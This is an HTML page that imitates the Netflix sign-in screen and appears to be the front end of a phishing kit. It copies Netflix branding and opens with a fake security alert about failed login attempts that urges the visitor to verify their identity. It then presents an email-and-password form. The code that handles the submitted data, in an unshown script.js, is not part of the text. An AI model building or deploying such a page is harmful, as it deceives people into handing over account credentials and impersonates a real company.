<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix - Sign In</title>
    <link rel="stylesheet" href="style.css">
    <link rel="icon" type="image/x-icon" href="https://assets.nflxext.com/us/ffe/siteui/common/icons/nficon2016.ico">
</head>
<body>
    <!-- Security Warning -->
    <div class="warning-alert" id="securityWarning">
        <div class="warning-content">
            <span class="warning-icon">⚠️</span>
            <span id="warningText">SECURITY ALERT: Multiple failed login attempts detected from your location. Please verify your identity.</span>
            <button class="close-warning" onclick="closeWarning()">×</button>
        </div>
    </div>

    <!-- Background Overlay -->
    <div class="background-overlay"></div>
    
    <!-- Netflix Logo -->
    <div class="netflix-logo">
        <svg width="167" height="45" viewBox="0 0 111 30">
            <path d="M105.062 14.28L111 30c-1.75-.25-3.499-.563-5.28-.845l-3.345-8.686-3.437 7.969c-1.687-.282-3.344-.376-5.031-.595l6.031-13.75L94.468 0h5.063l3.062 7.874L105.875 0h5.124l-5.937 14.28zM90.47 0h-4.594v27.25c1.5.094 3.062.156 4.594.343V0zm-8.563 26.937c-4.187-.281-8.375-.53-12.656-.625V0h4.687v21.875c2.688.062 5.375.28 7.969.405v4.657zM64.25 10.657v4.687h-6.406V26H53.22V0h13.125v4.687h-8.5v5.97h6.406zm-18.906-5.97V26.25c-1.563 0-3.156 0-4.688.062V4.687h-4.844V0h14.406v4.687h-4.874zM30.75 15.593c-2.062 0-4.5 0-6.25.095v6.968c2.75-.188 5.5-.406 8.281-.5v4.5l-12.968 1.032V0H32.78v4.687H24.5v5.967c2.281 0 4.562-.063 6.25-.063v5.002zM4.78 0v27.25c-1.5.094-3 .156-4.5.25V0h4.5z" fill="#e50914"></path>
        </svg>
    </div>

    <!-- Login Container -->
    <div class="login-container">
        <h1 class="login-title">Sign In</h1>
        
        <form id="loginForm" method="POST">
            <div class="input-group">
                <input type="email" id="email" name="email" class="input-field" placeholder="Email or phone number" required autocomplete="off">
            </div>
            
            <div class="input-group">
                <input type="password" id="password" name="password" class="input-field" placeholder="Password" required autocomplete="off">
                <span class="password-toggle" onclick="togglePassword()">👁️</span>
            </div>
            
            <button type="submit" class="login-btn" id="submitBtn">
                <span class="btn-text">Sign In</span>
                <div class="spinner" id="spinner"></div>
            </button>
            
            <div class="form-options">
                <label class="checkbox-container">
                    <input type="checkbox" name="remember">
                    <span class="checkmark"></span>
                    Remember me
                </label>
                <a href="#" class="help-link">Need help?</a>
            </div>
        </form>
        
        <div class="captcha-notice">
            <p>This page is protected by Google reCAPTCHA to ensure you're not a bot.</p>
            <a href="#" class="learn-more">Learn more.</a>
        </div>
        
        <div class="signup-link">
            New to Netflix? <a href="#">Sign up now</a>.
        </div>
    </div>

    <!-- Movie Banner -->
    <div class="movie-banner">
        <div class="movie-title">EXTRACTION</div>
        <div class="movie-subtitle">NOW STREAMING</div>
    </div>

    <!-- Footer -->
    <footer>
        <div class="footer-content">
            <div class="footer-title">Questions? Call 1-844-505-2993</div>
            <div class="footer-links">
                <a href="#">FAQ</a>
                <a href="#">Help Center</a>
                <a href="#">Terms of Use</a>
                <a href="#">Privacy</a>
                <a href="#">Cookie Preferences</a>
                <a href="#">Corporate Information</a>
                <a href="#">Contact Us</a>
            </div>
            <div class="copyright">
                &copy; 1997-2024 Netflix, Inc.
            </div>
        </div>
    </footer>

    <script src="script.js"></script>
</body>
</html>